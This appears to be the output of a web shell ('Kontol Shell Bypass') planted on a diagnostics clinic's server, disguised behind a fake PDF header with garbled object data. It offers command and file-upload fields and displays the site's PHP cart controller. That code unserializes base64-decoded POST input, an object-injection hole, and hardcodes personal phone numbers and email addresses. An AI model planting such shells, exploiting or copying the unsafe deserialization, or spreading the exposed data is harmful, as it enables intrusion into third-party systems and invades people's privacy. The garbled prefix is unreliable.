%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardadiagnostics.in/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardadiagnostics.in/application/controllers/Mycart.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Mycart extends MY_Controller
{

    public function __construct()
    {
        parent::__construct();
        $this->load->Model('Public_model');
		$this->load->library('session');
		if(empty($_SESSION['logged_user']['id'])) {
			redirect(LANG_URL . '/home');
		}
    }

    public function index()
    {
        $data = array();
        $head = array();
        $arrSeo = $this->Public_model->getSeo('cart');
        $head['title'] = @$arrSeo['title'];
        $head['description'] = @$arrSeo['description'];
        $head['keywords'] = str_replace(" ", ",", $head['title']);
		// Get Cart Data
		$user_id = $_SESSION['logged_user']['id'];
		
		// Get All Members Details
		$data['family_members'] = $this->Public_model->getAllFamilyMembers($user_id);
		
		// Get All Cart Items of user id
		$data['cart_items'] = $this->Public_model->getMyCartItems($user_id);
		
		$this->render('shopping_cart', $head, $data);
    }

	
	public function addToCart(){
	
     $product_id = base64_decode($_POST['product_id']);
     $memberArray = unserialize(base64_decode($_POST['member_info']));
	 $session_id = $_SESSION['__ci_last_regenerate'];
	 $user_id = $memberArray['user_id'];
	 $member_id = $memberArray['member_id'];
	 // Add to Cart
	 if($product_id>0 && $user_id>0){ 
	 
		echo $response = $this->Public_model->addToCart($product_id, $user_id, $session_id, $member_id);
		
	 }
	 
	 exit();	 
	}
	
	public function removeItems(){
		$cart_id = base64_decode($_POST['cart_id']);
		$member_id = base64_decode($_POST['member_id']);
		// Remove Items from Cart
		$response = $this->Public_model->removeItemsFromCart('shopping_cart',$cart_id, $member_id);
		if($response){
			echo "customPackage_".$cart_id;
		} else {
			echo "101";
		}

		exit();	 
	}
	/*
	* Function : setHomeCollectionRegistrationContact
	*
	*/
	public function addmore()
	{
		/*$email = $_SESSION['logged_user']['email'];
		$mobile = $_SESSION['logged_user']['phone'];
		$RegistrationId = '';//$_SESSION['logged_user']['his_registation_no'];
		$RegistrationNo = $_SESSION['logged_user']['his_registation_no'];
		
		$address = $post['house_no'];
		$addressLine2 = $post['locality'].' Landmark - '.$post['landmark'];
		$pinCode = $post['pincode'];
		$StateName = $post['state_id'];
		if($StateName){
			$stateDetails = getSingleCommonRecord('states', 'state_name',array('id'=>$StateName));
			$StateName = $stateDetails['state_name'];
		}
		$CityName = $post['city_id'];
		if($CityName){
			$cityDetails = getSingleCommonRecord('city', 'city_name', array('id'=>$CityName));
			$CityName = $cityDetails['city_name'];
		}*/
		/*$params = ["FacilityId"=>3,"SourcePatientId"=>"","TitleId"=>"1","mobilePhone"=>"9456633652","appointmentId"=>"","EmailId"=>"amkverma@gmail.com","dob"=>"2020-01-10","gender"=>"1","firstName"=>"Amit","middleName"=> "","lastName"=> "",
		"Address1"=>"091",
		"Address2"=>"",
		"NationalityId"=>"0",
		"cityCode"=>"Noida",
		"stateCode"=>'Uttar Pradesh',
		"PinCode"=>"",
		"countryCode"=>'india'];*/
		$params = ["FacilityId" => 3,
		"HospitalLocID" => 1,
		"UpdateID" => 0,
		"RegistrationId" => "",
		"RegistrationNo" => "7",
		"Address" => "Plot No 34",
		"AddressLine2" => "Knowledge Park III Landmark - NA",
		"PinCode" => "201306",
		"Mobile" => "8920976831", 
		"Email" => "amkverma3@gmail.com",
		"CountryName" => "india",
		"StateName" => "Uttar Pradesh",
		"CityName" => "Noida",
		"Status" => 1];
		
		/*
		"FacilityCode":"3",
		"SourcePatientId":"",
		"TitleId":title_name,
		"mobilePhone":login_phone,
		"appointmentId":RegistrationNo,
		"EmailId":login_email,
		"dob":dob,
		"gender":gender,
		"firstName": login_name,
		"middleName": "",
		"lastName": "",
		"Address1":address,
		"Address2":"",
		"NationalityId":"0",
		"cityCode":city_id,
		"stateCode":state_id,
		"PinCode":"",
		"countryCode":country*/
		//print_r($params); die('TEST');
		$response = phpcurlpostdataapi('SaveHomeCollectionRegistrationContact',json_encode($params));
		//echo $response = getrsp('CreatePatient',$params);
		print_r($params); 
		print_r($response); 
		die;
	}
}

Kontol Shell Bypass